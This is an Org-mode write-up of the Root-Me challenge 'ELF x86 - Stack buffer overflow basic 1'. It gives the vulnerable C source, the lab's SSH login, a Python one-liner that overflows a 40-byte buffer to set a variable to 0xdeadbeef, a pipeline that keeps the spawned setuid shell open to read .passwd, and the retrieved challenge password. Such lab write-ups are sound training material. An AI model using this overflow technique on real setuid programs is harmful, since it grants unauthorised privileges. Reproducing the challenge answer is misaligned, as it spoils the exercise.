98 lines
2.8 KiB
Org Mode
98 lines
2.8 KiB
Org Mode
* ELF x86 - Stack buffer overflow basic 1
|
|
Aufgabe
|
|
Einstellungen der Umgebung
|
|
PIE Position Independent Executable pas_valide.svg?1566650180
|
|
RelRO Read Only relocations pas_valide.svg?1566650180
|
|
NX Non-Executable Stack pas_valide.svg?1566650180
|
|
Heap exec Non-Executable Heap pas_valide.svg?1566650180
|
|
ASLR Address Space Layout Randomization pas_valide.svg?1566650180
|
|
SF Source Fortification pas_valide.svg?1566650180
|
|
SRC Zugriff auf den Source code valide.svg?1566650190
|
|
Quellcode
|
|
#+begin_src C
|
|
#include <unistd.h>
|
|
#include <sys/types.h>
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
|
|
int main()
|
|
{
|
|
|
|
int var;
|
|
int check = 0x04030201;
|
|
char buf[40];
|
|
|
|
fgets(buf,45,stdin);
|
|
|
|
printf("\n[buf]: %s\n", buf);
|
|
printf("[check] %p\n", check);
|
|
|
|
if ((check != 0x04030201) && (check != 0xdeadbeef))
|
|
printf ("\nYou are on the right way!\n");
|
|
|
|
if (check == 0xdeadbeef)
|
|
{
|
|
printf("Hell yeah! You win!\nOpening your shell...\n");
|
|
setreuid(geteuid(), geteuid());
|
|
system("/bin/bash");
|
|
printf("Shell closed! Bye.\n");
|
|
}
|
|
return 0;
|
|
}
|
|
#+end_src
|
|
|
|
#+begin_quote
|
|
Zugangsdaten für die Übung
|
|
Host challenge02.root-me.org
|
|
Protokoll SSH
|
|
Port 2222
|
|
Zugang per SSH ssh -p 2222 app-systeme-ch13@challenge02.root-me.org
|
|
Benutzername app-systeme-ch13
|
|
Passwort app-systeme-ch13
|
|
#+end_quote
|
|
|
|
#+begin_src sh
|
|
python3 -c "import sys; sys.stdout.buffer.write(b'A'*(40) + b'\xef\xbe\xad\xde')" | ./ch13
|
|
#+end_src
|
|
|
|
** Findings (live target)
|
|
|
|
- Remote path: =/challenge/app-systeme/ch13=
|
|
- Binary: =ch13: setuid ELF 32-bit, dynamically linked, not stripped=
|
|
- Effective mitigations from runtime check:
|
|
- Partial RELRO
|
|
- No stack canary
|
|
- NX enabled
|
|
- No PIE
|
|
- ASLR OFF (on target host)
|
|
- Vulnerability: =fgets(buf,45,stdin)= writes up to 44 bytes into =char buf[40]=, overflowing 4 bytes into adjacent =check=.
|
|
- Target value: overwrite =check= from =0x04030201= to =0xdeadbeef= (little-endian bytes =\xef\xbe\xad\xde=).
|
|
|
|
** Working exploitation flow
|
|
|
|
- Basic trigger (proves control of =check=):
|
|
|
|
#+begin_src sh
|
|
python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + b'\xef\xbe\xad\xde')" | ./ch13
|
|
#+end_src
|
|
|
|
- To keep stdin open for the spawned SUID shell, use a pipeline with =cat=:
|
|
|
|
#+begin_src sh
|
|
(python3 -c "import sys; sys.stdout.buffer.write(b'A'*40+b'\xef\xbe\xad\xde')"; cat) | ./ch13
|
|
id
|
|
cat .passwd
|
|
exit
|
|
#+end_src
|
|
|
|
- Observed privilege in spawned shell:
|
|
- =uid=1213(app-systeme-ch13-cracked)=
|
|
- =gid=1113(app-systeme-ch13)=
|
|
- Retrieved validation password:
|
|
- =1w4ntm0r3pr0np1s=
|
|
|
|
** Helper scripts
|
|
|
|
- =helper_recon.py=: SSH recon script (pwd, ls, file, checksec, smoke run).
|
|
- =helper_exploit_password.py=: SSH interactive exploit script that keeps stdin open and reads =.passwd=.
|